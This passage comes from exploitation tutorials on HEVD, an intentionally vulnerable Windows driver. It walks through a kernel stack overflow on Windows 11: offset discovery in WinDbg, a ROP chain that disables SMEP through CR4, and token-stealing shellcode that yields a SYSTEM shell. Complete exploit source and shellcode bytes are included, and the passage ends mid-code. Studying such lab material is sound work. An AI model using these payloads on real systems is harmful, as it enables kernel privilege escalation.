    RtlCopyMemory(shellcode, sc, 256);

    QWORD ntBase = getBaseAddr(L"ntoskrnl.exe");
    QWORD STACK_PIVOT_ADDR = 0x48000000;
    QWORD STACK_PIVOT_GADGET = ntBase + 0x317f70; // mov esp, 0x48000000; add esp, 0x28; ret; 
    QWORD POP_RCX = ntBase + 0x20a386;
    QWORD MOV_CR4_RCX = ntBase + 0x3acd47;
    int index = 0;

    QWORD stackAddr = STACK_PIVOT_ADDR - 0x1000;
    LPVOID kernelStack = VirtualAlloc((LPVOID)stackAddr, 0x14000, MEM_COMMIT | MEM_RESERVE, PAGE_READWRITE);
    if (!VirtualLock(kernelStack, 0x14000)) {
        printf("Error using VirtualLock: %d\n", GetLastError());
    }

    RtlFillMemory((LPVOID)STACK_PIVOT_ADDR, 0x28, '\x41');
    QWORD* rop = (QWORD*)((QWORD)STACK_PIVOT_ADDR + 0x28);

    *(rop + index++) = POP_RCX;
    *(rop + index++) = 0x350ef8 ^ 1UL << 20;
    *(rop + index++) = MOV_CR4_RCX;
    *(rop + index++) = (QWORD)shellcode;

    UserObject userObject = { 0 };
    userObject.ObjectID =   (ULONG_PTR)0x4141414141414141;
    userObject.ObjectType = (ULONG_PTR)STACK_PIVOT_GADGET;

    printf("[>] Stack Pivot Gadget at %llx\n", STACK_PIVOT_GADGET);
    printf("[>] New Stack at %llx\n", STACK_PIVOT_ADDR);
    getchar();

    DeviceIoControl(hDriver, 0x222023, (LPVOID)&userObject, sizeof(userObject), NULL, 0, NULL, NULL);
    
    printf("[>] Enjoy your shell!\n");
    system("cmd");
    return 0;
}

Running the exploit results in a SYSTEM shell on the target.

The post Windows Kernel Exploitation – HEVD x64 Type Confusion appeared first on Vulndev.

Windows Kernel Exploitation – HEVD x64 Stack Overflow

By: xct
2 July 2022 at 12:01

After setting up our debugging environment, we will look at HEVD for a few posts before diving into real-world scenarios. HEVD is an awesome, intentionally vulnerable driver by HackSysTeam that allows exploiting a lot of different kernel vulnerability types. I think this one is great to get started because you can play with exploitation without reversing any big applications or drivers.

Arguably the easiest exploit on HEVD is a classic stack overflow where you overwrite the return address and have a good amount of space before & after the overwrite. We are using HEVD on default OS settings, which means ASLR, DEP & SMEP are enabled. The vulnerable function does not use stack cookies.

Overview

Target: HEVD
OS/Arch: Windows 11 x64
Protections: ASLR, DEP, SMEP

Vulnerability Discovery

I’m not going to pretend that I don’t know where the vulnerability is and will focus primarily on the exploitation part. The vulnerable function is TriggerBufferOverflowStack, which uses RtlCopyMemory to copy the user-provided buffer into a fixed-size buffer of size 512 on the kernel stack.

In assembly this ends up as a memmove.

To see what’s actually happening, we are going to create our “exploit” and just call this function while having a breakpoint on it. We are going to create a new C++ console project with the following code:

#include <stdio.h>
#include <Windows.h>


int main()
{
	HANDLE hDriver = CreateFile(L"\\\\.\\HacksysExtremeVulnerableDriver", GENERIC_READ | GENERIC_WRITE, 0, NULL, OPEN_EXISTING, 0, NULL);
	if (hDriver == INVALID_HANDLE_VALUE)
	{
		printf("[!] Error while creating a handle to the driver: %d\n", GetLastError());
		exit(1);
	}

	LPVOID uBuffer = VirtualAlloc(NULL, 512, MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);
	RtlFillMemory(uBuffer, 512, 'A');
	DeviceIoControl(hDriver, 0x222003, (LPVOID)uBuffer, 512, NULL, 0, NULL, NULL); // pass the buffer itself and its length, not the address and size of the pointer

}

There are a few noteworthy things here. First of all, we are using CreateFile to get a handle to the driver, using its name \\.\HacksysExtremeVulnerableDriver. You can find this name by looking at the DriverEntry function in IDA.

Then we allocate our user buffer with a size of 512 which is the same size the kernel expects. Then we call the function via an IOCTL. This is essentially a way to tell the kernel to call a specific function in our driver, identified by the number, here 0x222003. Finding the number can be a bit tricky – in this case, we can go to TriggerBufferOverflowStack in IDA and then press x to find references. This shows a reference to BufferOverflowStackIoctlHandler for which we look for references again. Finally, we end up in IrpDeviceIoCtlHandler which is a big switch/case statement calling different functions depending on the IOCTL number you provide.

If we follow the arrow pointing to this basic block backward (can be a few times, but here it’s only once) we eventually end up at the correct number.
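
Once the number is known, it helps to see how it is put together. Windows packs an IOCTL code from four fields (device type, required access, function number, transfer method) with the CTL_CODE macro. The sketch below reimplements that packing in portable C++. The struct and function names are invented for illustration; only the bit layout comes from the Windows headers:

```cpp
#include <cassert>
#include <cstdint>

// Fields of a Windows I/O control code, as laid out by the CTL_CODE macro:
// bits 31..16 device type, 15..14 access, 13..2 function, 1..0 method.
struct IoctlFields {
    uint32_t deviceType;
    uint32_t access;
    uint32_t function;
    uint32_t method;
};

IoctlFields decodeIoctl(uint32_t code) {
    return IoctlFields{
        (code >> 16) & 0xFFFF,
        (code >> 14) & 0x3,
        (code >> 2) & 0xFFF,
        code & 0x3
    };
}

// Same packing as CTL_CODE(DeviceType, Function, Method, Access).
uint32_t encodeIoctl(uint32_t deviceType, uint32_t function, uint32_t method, uint32_t access) {
    assert(deviceType <= 0xFFFF && function <= 0xFFF && method <= 3 && access <= 3);
    return (deviceType << 16) | (access << 14) | (function << 2) | method;
}
```

Decoding 0x222003 yields device type 0x22 (FILE_DEVICE_UNKNOWN), function 0x800 and method 3 (METHOD_NEITHER). The type confusion IOCTL 0x222023 differs only in its function number, 0x808.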

To compile our exploit we set it to Release & x64. We now know how to call the function & are going to set a breakpoint in WinDbg. In order for WinDbg to automatically load the correct symbols for HEVD, you should place HEVD.pdb at C:\projects\hevd\build\driver\vulnerable\x64\HEVD\HEVD.pdb.

0: kd> ba e1 HEVD!TriggerBufferOverflowStack
0: kd> g
... <run exploit> ...
Breakpoint 0 hit
HEVD!TriggerBufferOverflowStack:
fffff805`7d3e65b4 48895c2408      mov     qword ptr [rsp+8],rbx
u rip L40
...
fffff805`7d3e666d ff1595b9f7ff    call    qword ptr [HEVD!_imp_DbgPrintEx (fffff805`7d362008)]
fffff805`7d3e6673 4c8bc6          mov     r8,rsi
fffff805`7d3e6676 488bd7          mov     rdx,rdi
fffff805`7d3e6679 488d4c2420      lea     rcx,[rsp+20h]
fffff805`7d3e667e e83dabf7ff      call    HEVD!memcpy (fffff805`7d3611c0)
fffff805`7d3e6683 eb1b            jmp     HEVD!TriggerBufferOverflowStack+0xec (fffff805`7d3e66a0)
...

We can see that the memmove we saw in IDA is actually a memcpy. Let’s break there.

Breakpoint 1 hit
HEVD!TriggerBufferOverflowStack+0xca:
fffff805`7d3e667e e83dabf7ff      call    HEVD!memcpy (fffff805`7d3611c0)
1: kd> r
rax=0000000000000000 rbx=0000000000000000 rcx=ffffc88ab6420f60
rdx=0000022b3e180000 rsi=0000000000000200 rdi=0000022b3e180000
rip=fffff8057d3e667e rsp=ffffc88ab6420f40 rbp=ffffdb899c235c40
 r8=0000000000000200  r9=000000000000004d r10=0000000000000000
...

In the Windows x64 calling convention, the first four integer or pointer arguments are passed in RCX, RDX, R8 & R9; any additional arguments are placed on the stack. We can see that RCX is a kernel address and therefore likely the target kernel buffer. RDX is a user-mode address and points to our input buffer. R8 contains the length, here 0x200 (512).

1: kd> dq rcx L4
ffffc88a`b6420f60  00000000`00000000 00000000`00000000
ffffc88a`b6420f70  00000000`00000000 00000000`00000000
1: kd> dq rdx L4
0000022b`3e180000  41414141`41414141 41414141`41414141
0000022b`3e180010  41414141`41414141 41414141`41414141

Let’s step over the call and observe that the kernel buffer is filled with our input.

1: kd> p
HEVD!TriggerBufferOverflowStack+0xcf:
fffff805`7d3e6683 eb1b            jmp     HEVD!TriggerBufferOverflowStack+0xec (fffff805`7d3e66a0)
1: kd> dq rcx L4
ffffc88a`b6420f60  41414141`41414141 41414141`41414141
ffffc88a`b6420f70  41414141`41414141 41414141`41414141

Now let’s see what happens when we extend the length of our input buffer:

...
LPVOID uBuffer = VirtualAlloc(NULL, 2500, MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);
RtlFillMemory(uBuffer, 2500, 'A');
DeviceIoControl(hDriver, 0x222003, (LPVOID)uBuffer, 2500, NULL, 0, NULL, NULL);
...

If we break again but this time run until the function returns, we can see that the return address has been overwritten:

Breakpoint 1 hit
HEVD!TriggerBufferOverflowStack+0xca:
fffff805`7d3e667e e83dabf7ff      call    HEVD!memcpy (fffff805`7d3611c0)
1: kd> p
HEVD!TriggerBufferOverflowStack+0xcf:
fffff805`7d3e6683 eb1b            jmp     HEVD!TriggerBufferOverflowStack+0xec (fffff805`7d3e66a0)
1: kd> pt
HEVD!TriggerBufferOverflowStack+0x10b:
fffff805`7d3e66bf c3              ret
1: kd> dq rsp
ffffc88a`b4a21778  41414141`41414141 41414141`41414141
ffffc88a`b4a21788  41414141`41414141 41414141`41414141
1: kd> g
Access violation - code c0000005 (!!! second chance !!!)
HEVD!TriggerBufferOverflowStack+0x10b:
fffff805`7d3e66bf c3              ret

We can see that the return address was overwritten with our input “A”s. At this point, we confirmed the vulnerability & can trigger a crash.

Exploitation

Now that we can crash it with a large input buffer, the next step is figuring out the exact offset at which we overwrite RIP. We can generate a pattern with msf, send it, and then inspect RSP on the ret:

msf-pattern_create -l 2500
Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8...
...
LPVOID uBuffer = VirtualAlloc(NULL, 2500, MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);
const char* pattern = { "Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8..."};
RtlCopyMemory(uBuffer, pattern, 2500);
DeviceIoControl(hDriver, 0x222003, (LPVOID)uBuffer, 2500, NULL, 0, NULL, NULL);
...
HEVD!TriggerBufferOverflowStack+0x10b:
fffff800`6ebf66bf c3              ret
1: kd> dq rsp
ffffba89`e9fe9778  43327243`31724330 35724334`72433372
ffffba89`e9fe9788  72433772`43367243 43307343`39724338
msf-pattern_offset -q 43327243 -l 2500
[*] Exact match at offset 2076
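
The lookup can also be reproduced without Metasploit. The following sketch regenerates the Aa0Aa1Aa2... pattern and searches it for a value as it was read from the little-endian memory dump. The function names are made up for this example, and it only models the default upper/lower/digit character sets:

```cpp
#include <cassert>
#include <cstddef>
#include <cstdint>
#include <string>

// Generates the cyclic pattern: triples of upper-case letter, lower-case letter, digit.
std::string patternCreate(size_t length) {
    assert(length <= 26u * 26u * 10u * 3u);   // pattern would repeat beyond this
    std::string out;
    for (char upper = 'A'; upper <= 'Z' && out.size() < length; ++upper)
        for (char lower = 'a'; lower <= 'z' && out.size() < length; ++lower)
            for (char digit = '0'; digit <= '9' && out.size() < length; ++digit) {
                out += upper;
                out += lower;
                out += digit;
            }
    out.resize(length);
    return out;
}

// Turns a value from a debugger dump back into the byte order it has in memory.
std::string littleEndianBytes(uint64_t value, size_t width) {
    std::string bytes;
    for (size_t i = 0; i < width; ++i)
        bytes += static_cast<char>((value >> (8 * i)) & 0xFF);
    return bytes;
}

// Offset of the value inside the pattern, or -1 if it does not occur.
long patternOffset(uint64_t value, size_t width, size_t length) {
    size_t pos = patternCreate(length).find(littleEndianBytes(value, width));
    return pos == std::string::npos ? -1 : static_cast<long>(pos);
}
```

Searching for the 4-byte value 0x43327243 returns 2076, matching the msf output. Searching for the full quadword at RSP, 0x4332724331724330, returns 2072, because 43327243 is only the upper half of that quadword and therefore sits 4 bytes further in.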

After sending the pattern and letting it run, we hit the access violation again, and inspecting RSP gives us the offset: 2076. Note that this offset is slightly off: the value we searched for, 43327243, is the upper half of the quadword at RSP, so it sits 4 bytes into the return address. If you debug it with an offset of 2076, you will see that only the second half of the shellcode address ends up at the correct position. At this point, we could allocate shellcode and try to jump to it. In the following snippet, I account for the shift (the real offset being 2076 - 4 = 2072).

...
LPVOID uBuffer = VirtualAlloc(NULL, 2500, MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);
LPVOID shellcode = VirtualAlloc(NULL, 500, MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);
RtlFillMemory(uBuffer, 2500, '\x41');
RtlFillMemory(shellcode, 500, '\x90');
*(QWORD*)((QWORD)uBuffer + 2072) = (QWORD)shellcode;
...
0: kd> ba e1 HEVD!TriggerBufferOverflowStack+0x10b
0: kd> g
Breakpoint 0 hit
HEVD!TriggerBufferOverflowStack+0x10b:
fffff802`a74966bf c3              ret
1: kd> dq rsp
fffffa8a`25b72778  00000173`3c510000 41414141`41414141
fffffa8a`25b72788  41414141`41414141 41414141`41414141
1: kd> p
00000173`3c510000 90              nop
1: kd> p
KDTARGET: Refreshing KD connection

*** Fatal System Error: 0x000000fc

After trying to execute one of the NOPs we get an error. We can get some additional information with the analyze extension:

!analyze -v
...
ATTEMPTED_EXECUTE_OF_NOEXECUTE_MEMORY (fc)

This is SMEP (Supervisor Mode Execution Prevention) kicking in. The kernel is not allowed to execute code at the user-mode address we provided and therefore cannot simply run our shellcode. To bypass SMEP, we have to find a way to either disable it or make it “think” our shellcode is not on a user-mode page. For this introductory exploit, I’ll just show the first approach, disabling it.

SMEP is controlled by bit 20 (counting from zero) of the CR4 register.

If we can somehow change that bit, we can disable SMEP & still jump to our shellcode and execute it. While we cannot execute shellcode directly, we can use ROP to flip that bit. To do that, we first need to look for gadgets we can use inside the driver or kernel. The kernel is a much better source of gadgets due to its size. I’m a big fan of ropper so I’m going to copy ntoskrnl.exe from the Debuggee VM to my Kali VM.

ropper --file ntoskrnl.exe --console
(ntoskrnl.exe/PE/x86_64)> search %cr4%
0x00000001403acd47: mov cr4, rcx; ret;
(ntoskrnl.exe/PE/x86_64)> search pop rcx
0x000000014020a386: pop rcx; ret;

We identified 2 gadgets we can use: POP RCX to load a value with bit 20 cleared into RCX, and MOV CR4, RCX to move that value into CR4. It’s usually a good idea to read the “old” value of CR4 and then modify it. For simplicity, we are just going to observe what it looks like in the debugger when we execute our exploit and then hardcode it here.

Before adding the ROP chain to our exploit we have to think about ASLR. Ropper shows relative addresses, so we need to find the load address of the kernel. Fortunately, this is very easy from a medium integrity shell, as there is an API that lets us obtain it:

QWORD getBaseAddr(LPCWSTR drvName) {
	LPVOID drivers[512];
	DWORD cbNeeded;
	int nDrivers, i = 0;
	if (EnumDeviceDrivers(drivers, sizeof(drivers), &cbNeeded) && cbNeeded < sizeof(drivers)) {
		WCHAR szDrivers[512];
		nDrivers = cbNeeded / sizeof(drivers[0]);
		for (i = 0; i < nDrivers; i++) {
			if (GetDeviceDriverBaseName(drivers[i], szDrivers, sizeof(szDrivers) / sizeof(szDrivers[0]))) {
				if (wcscmp(szDrivers, drvName) == 0) {
					return (QWORD)drivers[i];
				}
			}
		}
	}
	return 0;
}
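
The arithmetic that turns a ropper address into a runtime address is simple but easy to get wrong, so here is a minimal sketch. It assumes the addresses ropper printed are relative to a preferred image base of 0x140000000, which is read off the ropper output above rather than parsed from the PE header. The helper name is hypothetical:

```cpp
#include <cassert>
#include <cstdint>

// Preferred image base implied by the ropper output (assumption of this sketch).
constexpr uint64_t kPreferredBase = 0x140000000ULL;

// Converts an address as printed by ropper into the address of the same
// gadget in the running kernel, given the base returned by getBaseAddr.
uint64_t rebaseGadget(uint64_t ropperAddress, uint64_t runtimeBase,
                      uint64_t preferredBase = kPreferredBase) {
    assert(ropperAddress >= preferredBase);            // otherwise the offset would underflow
    uint64_t offset = ropperAddress - preferredBase;   // e.g. 0x20a386 for pop rcx
    return runtimeBase + offset;
}
```

With an example load address of 0xfffff80436200000, the pop rcx gadget at 0x14020a386 ends up at 0xfffff8043640a386 and the mov cr4, rcx gadget at 0x1403acd47 ends up at 0xfffff804365acd47.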

With the base address, we can now add the gadget offsets to obtain a proper ROP chain. We update our exploit with this chain & a dummy value for CR4:

#include <stdio.h>
#include <Windows.h>
#include <winternl.h>
#include <Psapi.h>

#define QWORD ULONGLONG

QWORD getBaseAddr(LPCWSTR drvName) {
	LPVOID drivers[512];
	DWORD cbNeeded;
	int nDrivers, i = 0;
	if (EnumDeviceDrivers(drivers, sizeof(drivers), &cbNeeded) && cbNeeded < sizeof(drivers)) {
		WCHAR szDrivers[512];
		nDrivers = cbNeeded / sizeof(drivers[0]);
		for (i = 0; i < nDrivers; i++) {
			if (GetDeviceDriverBaseName(drivers[i], szDrivers, sizeof(szDrivers) / sizeof(szDrivers[0]))) {
				if (wcscmp(szDrivers, drvName) == 0) {
					return (QWORD)drivers[i];
				}
			}
		}
	}
	return 0;
}

int main()
{
	HANDLE hDriver = CreateFile(L"\\\\.\\HacksysExtremeVulnerableDriver", GENERIC_READ | GENERIC_WRITE, 0, NULL, OPEN_EXISTING, 0, NULL);
	if (hDriver == INVALID_HANDLE_VALUE)
	{
		printf("[!] Error while creating a handle to the driver: %d\n", GetLastError());
		exit(1);
	}

	QWORD ntBase = getBaseAddr(L"ntoskrnl.exe");
	printf("[>] NTBase: %llx\n", ntBase);
	QWORD POP_RCX = ntBase + 0x20a386;     // pop rcx; ret;
	QWORD MOV_CR4_RCX = ntBase + 0x3acd47; // mov cr4, rcx; ret;
	int index = 0;

	LPVOID uBuffer = VirtualAlloc(NULL, 2500, MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);
	LPVOID shellcode = VirtualAlloc(NULL, 500, MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);
	RtlFillMemory(uBuffer, 2500, '\x41');
	RtlFillMemory(shellcode, 500, '\x90');

	QWORD* rop = (QWORD*)((QWORD)uBuffer + 2072);
	
	*(rop + index++) = POP_RCX;
	*(rop + index++) = 0x0;
	*(rop + index++) = MOV_CR4_RCX;
	*(rop + index++) = (QWORD)shellcode;

	DeviceIoControl(hDriver, 0x222003, (LPVOID)uBuffer, 2500, NULL, 0, NULL, NULL);

}

We run it with a breakpoint on the overwritten return address:

HEVD!TriggerBufferOverflowStack+0x10b:
fffff804`5e6f66bf c3              ret
0: kd> dq rsp
fffff088`b0910778  fffff804`3640a386 00000000`00000000
fffff088`b0910788  fffff804`365acd47 0000016d`86580000
fffff088`b0910798  41414141`41414141 41414141`41414141
fffff088`b09107a8  41414141`41414141 41414141`41414141
fffff088`b09107b8  41414141`41414141 41414141`41414141
fffff088`b09107c8  41414141`41414141 41414141`41414141
fffff088`b09107d8  41414141`41414141 41414141`41414141
fffff088`b09107e8  41414141`41414141 41414141`41414141
0: kd> p
nt!HalSendNMI+0x276:
fffff804`3640a386 59              pop     rcx
1: kd> p
nt!HalSendNMI+0x277:
fffff804`3640a387 c3              ret
1: kd> 
nt!KeFlushCurrentTbImmediately+0x17:
fffff804`365acd47 0f22e1          mov     cr4,rcx
1: kd> 
Unknown exception - code c0000096 (!!! second chance !!!)
nt!KeFlushCurrentTbImmediately+0x17:
fffff804`365acd47 0f22e1          mov     cr4,rcx

We get an exception – it does not allow us to write cr4 with zero. Let’s inspect its current value:

1: kd> r cr4
cr4=0000000000350ef8

We can hardcode the value and flip the 20th bit, then try again:

*(rop + index++) = 0x350ef8 ^ 1UL << 20;
1: kd> 
nt!KeFlushCurrentTbImmediately+0x17:
fffff800`737acd47 0f22e1          mov     cr4,rcx
1: kd> r rcx
rcx=0000000000250ef8
1: kd> p
nt!KeFlushCurrentTbImmediately+0x1a:
fffff800`737acd4a c3              ret
1: kd> p
0000026a`93680000 90              nop
1: kd> 
0000026a`93680001 90              nop
1: kd> 
0000026a`93680002 90              nop

We can see that by setting a value that makes more sense we can disable SMEP & execute our NOPs! Now we need kernel shellcode that will somehow let us elevate privileges without causing a BSOD.
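
The bit manipulation itself can be checked in isolation. The sketch below uses hypothetical helper names and contrasts the XOR used in the exploit, which toggles the bit, with an AND-NOT, which always clears it. With the observed CR4 value both give the same result, but only the second stays correct if SMEP is already off:

```cpp
#include <cassert>
#include <cstdint>

constexpr unsigned kSmepBit = 20;                   // CR4.SMEP
constexpr uint64_t kSmepMask = 1ULL << kSmepBit;    // 0x100000

bool smepEnabled(uint64_t cr4) {
    return (cr4 & kSmepMask) != 0;
}

// What the exploit does: XOR flips the bit, whatever its current state.
uint64_t toggleSmep(uint64_t cr4) {
    return cr4 ^ kSmepMask;
}

// Alternative: always clears the bit and leaves every other flag untouched.
uint64_t withoutSmep(uint64_t cr4) {
    uint64_t result = cr4 & ~kSmepMask;
    assert(!smepEnabled(result));
    return result;
}
```

For the CR4 value seen in the debugger, both toggleSmep(0x350ef8) and withoutSmep(0x350ef8) return 0x250ef8, the value that ends up in RCX in the trace above.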

Kernel Shellcode

For this exploit, we are going to go with a simple token stealing payload. Every process has an associated token that defines its privileges. A pointer to this token is saved in the EPROCESS structure:

0: kd> dt nt!_EPROCESS
...
+0x440 UniqueProcessId      : Ptr64 Void
+0x448 ActiveProcessLinks   : _LIST_ENTRY
...
+0x4b8 Token                : _EX_FAST_REF
...

If we can read this pointer & copy it over the one from our process, we get full SYSTEM privileges. Essentially the shellcode will find our EPROCESS and save a pointer to it. Then it will walk ActiveProcessLinks (which is a linked list of processes) until it finds a SYSTEM process and copies the token pointer from that one over the one from our process.
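
Before turning to the assembly, the walk can be modelled in user mode. The FakeProcess struct below is a hypothetical, heavily reduced stand-in for _EPROCESS with only the three fields the payload touches, and its offsets are not the real ones. Unlike the shellcode, the model stops after one full loop instead of spinning forever when no PID 4 exists:

```cpp
#include <cassert>
#include <cstddef>
#include <cstdint>

struct ListEntry {
    ListEntry* Flink;
    ListEntry* Blink;
};

// Hypothetical miniature of _EPROCESS (real offsets differ per Windows build).
struct FakeProcess {
    uint64_t UniqueProcessId;
    ListEntry ActiveProcessLinks;
    uint64_t Token;                  // _EX_FAST_REF: pointer with a ref count in the low 4 bits
};

// Same idea as `sub r8, 0x448`: step back from the list entry to the struct start.
FakeProcess* processFromLinks(ListEntry* links) {
    return reinterpret_cast<FakeProcess*>(
        reinterpret_cast<char*>(links) - offsetof(FakeProcess, ActiveProcessLinks));
}

// Links an array of processes into a circular doubly linked list.
void linkProcesses(FakeProcess* procs, size_t count) {
    assert(count > 0);
    for (size_t i = 0; i < count; ++i) {
        FakeProcess& next = procs[(i + 1) % count];
        procs[i].ActiveProcessLinks.Flink = &next.ActiveProcessLinks;
        next.ActiveProcessLinks.Blink = &procs[i].ActiveProcessLinks;
    }
}

// Walks the list from `current` until PID 4 is found, then copies its token
// (with the low 4 bits cleared) over the current process's token.
bool stealSystemToken(FakeProcess* current) {
    FakeProcess* candidate = current;
    do {
        candidate = processFromLinks(candidate->ActiveProcessLinks.Flink);
        if (candidate->UniqueProcessId == 4) {
            current->Token = candidate->Token & ~0xFULL;
            return true;
        }
    } while (candidate != current);
    return false;                    // no SYSTEM process in this list
}
```

Linking three fake processes and calling stealSystemToken on a non-SYSTEM entry leaves that entry with the SYSTEM token value, minus the reference-count bits.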

[BITS 64]
start:
  mov rax, [gs:0x188]       ; _KPCR.Prcb.CurrentThread (_KTHREAD)
  mov rax, [rax + 0xb8]     ; ApcState.Process (current _EPROCESS)
  mov r8, rax               ; Store current _EPROCESS ptr in R8

loop:
  mov r8, [r8 + 0x448]      ; ActiveProcessLinks
  sub r8, 0x448             ; Go back to start of _EPROCESS
  mov r9, [r8 + 0x440]      ; UniqueProcessId (PID)
  cmp r9, 4                 ; SYSTEM PID? 
  jnz loop                  ; Loop until PID == 4

replace:
  mov r9, [r8 + 0x4b8]      ; Get SYSTEM token
  and r9b, 0xf0             ; Clear low 4 bits of _EX_FAST_REF structure (byte-sized AND keeps the upper bits)
  mov [rax + 0x4b8], r9     ; Copy SYSTEM token to current process
  
  xor rax, rax
  ret

Note that these offsets change depending on which operating system version you are targeting, so you have to look them up via WinDbg. To assemble the shellcode we can use NASM, and radare2 to dump the result as a C array:

nasm shellcode.asm -o shellcode.bin -f bin
radare2 -b 32 -c 'pc' ./shellcode.bin
#define _BUFFER_SIZE 256
const uint8_t buffer[_BUFFER_SIZE] = {
  0x65, 0x48, 0x8b, 0x04, 0x25, 0x88, 0x01, 0x00, 0x00, 0x48,
  ...
};

While this will work fine and replace the token – we are still in an IOCTL and have messed with the stack. Just returning from here will cause a BSOD. There are at least 2 possibilities here – either we figure out how to restore the stack to the point where we can return somewhere that will not crash or use a generic way to avoid crashes.

For this post we choose the generic way by Kristal and append it to our shellcode:

[BITS 64]
start:
  mov rax, [gs:0x188]       ; KPCRB.CurrentThread (_KTHREAD)
  mov rax, [rax + 0xb8]     ; APCState.Process (current _EPROCESS)
  mov r8, rax               ; Copy current _EPROCESS ptr into r8 (rax keeps the original)

loop:
  mov r8, [r8 + 0x448]      ; ActiveProcessLinks
  sub r8, 0x448             ; Go back to start of _EPROCESS
  mov r9, [r8 + 0x440]      ; UniqueProcessId (PID)
  cmp r9, 4                 ; SYSTEM PID? 
  jnz loop                  ; Loop until PID == 4

replace:
  mov rcx, [r8 + 0x4b8]      ; Get SYSTEM token
  and cl, 0xf0               ; Clear low 4 bits of _EX_FAST_REF structure
  mov [rax + 0x4b8], rcx     ; Copy SYSTEM token to current process

cleanup:
  mov rax, [gs:0x188]       ; _KPCR.Prcb.CurrentThread
  mov cx, [rax + 0x1e4]     ; KTHREAD.KernelApcDisable
  inc cx
  mov [rax + 0x1e4], cx
  mov rdx, [rax + 0x90]     ; ETHREAD.TrapFrame
  mov rcx, [rdx + 0x168]    ; ETHREAD.TrapFrame.Rip
  mov r11, [rdx + 0x178]    ; ETHREAD.TrapFrame.EFlags
  mov rsp, [rdx + 0x180]    ; ETHREAD.TrapFrame.Rsp
  mov rbp, [rdx + 0x158]    ; ETHREAD.TrapFrame.Rbp
  xor eax, eax  ;
  swapgs
  o64 sysret  

This makes our full exploit:

#include <stdio.h>
#include <Windows.h>
#include <winternl.h>
#include <Psapi.h>

#define QWORD ULONGLONG

BYTE sc[256] = {
  0x65, 0x48, 0x8b, 0x04, 0x25, 0x88, 0x01, 0x00, 0x00, 0x48,
  0x8b, 0x80, 0xb8, 0x00, 0x00, 0x00, 0x49, 0x89, 0xc0, 0x4d,
  0x8b, 0x80, 0x48, 0x04, 0x00, 0x00, 0x49, 0x81, 0xe8, 0x48,
  0x04, 0x00, 0x00, 0x4d, 0x8b, 0x88, 0x40, 0x04, 0x00, 0x00,
  0x49, 0x83, 0xf9, 0x04, 0x75, 0xe5, 0x49, 0x8b, 0x88, 0xb8,
  0x04, 0x00, 0x00, 0x80, 0xe1, 0xf0, 0x48, 0x89, 0x88, 0xb8,
  0x04, 0x00, 0x00, 0x65, 0x48, 0x8b, 0x04, 0x25, 0x88, 0x01,
  0x00, 0x00, 0x66, 0x8b, 0x88, 0xe4, 0x01, 0x00, 0x00, 0x66,
  0xff, 0xc1, 0x66, 0x89, 0x88, 0xe4, 0x01, 0x00, 0x00, 0x48,
  0x8b, 0x90, 0x90, 0x00, 0x00, 0x00, 0x48, 0x8b, 0x8a, 0x68,
  0x01, 0x00, 0x00, 0x4c, 0x8b, 0x9a, 0x78, 0x01, 0x00, 0x00,
  0x48, 0x8b, 0xa2, 0x80, 0x01, 0x00, 0x00, 0x48, 0x8b, 0xaa,
  0x58, 0x01, 0x00, 0x00, 0x31, 0xc0, 0x0f, 0x01, 0xf8, 0x48,
  0x0f, 0x07, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff,
  0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff,
  0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff,
  0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff,
  0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff,
  0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff,
  0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff,
  0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff,
  0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff,
  0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff,
  0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff,
  0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff,
  0xff, 0xff, 0xff, 0xff, 0xff, 0xff
};

QWORD getBaseAddr(LPCWSTR drvName) {
	LPVOID drivers[512];
	DWORD cbNeeded;
	int nDrivers, i = 0;
	if (EnumDeviceDrivers(drivers, sizeof(drivers), &cbNeeded) && cbNeeded < sizeof(drivers)) {
		WCHAR szDrivers[512];
		nDrivers = cbNeeded / sizeof(drivers[0]);
		for (i = 0; i < nDrivers; i++) {
			if (GetDeviceDriverBaseName(drivers[i], szDrivers, sizeof(szDrivers) / sizeof(szDrivers[0]))) {
				if (wcscmp(szDrivers, drvName) == 0) {
					return (QWORD)drivers[i];
				}
			}
		}
	}
	return 0;
}

int main()
{
	HANDLE hDriver = CreateFile(L"\\\\.\\HacksysExtremeVulnerableDriver", GENERIC_READ | GENERIC_WRITE, 0, NULL, OPEN_EXISTING, 0, NULL);
	if (hDriver == INVALID_HANDLE_VALUE)
	{
		printf("[!] Error while creating a handle to the driver: %d\n", GetLastError());
		exit(1);
	}

	QWORD ntBase = getBaseAddr(L"ntoskrnl.exe");
	printf("[>] NTBase: %llx\n", ntBase);
	QWORD POP_RCX = ntBase + 0x20a386;
	QWORD MOV_CR4_RCX = ntBase + 0x3acd47; 

	int index = 0;
	int bufSize = 2072 + 4 * 8;

	LPVOID uBuffer = VirtualAlloc(NULL, bufSize, MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);
	LPVOID shellcode = VirtualAlloc(NULL, 256, MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);
	RtlFillMemory(uBuffer, bufSize, '\x41');
	RtlCopyMemory(shellcode, sc, 256);

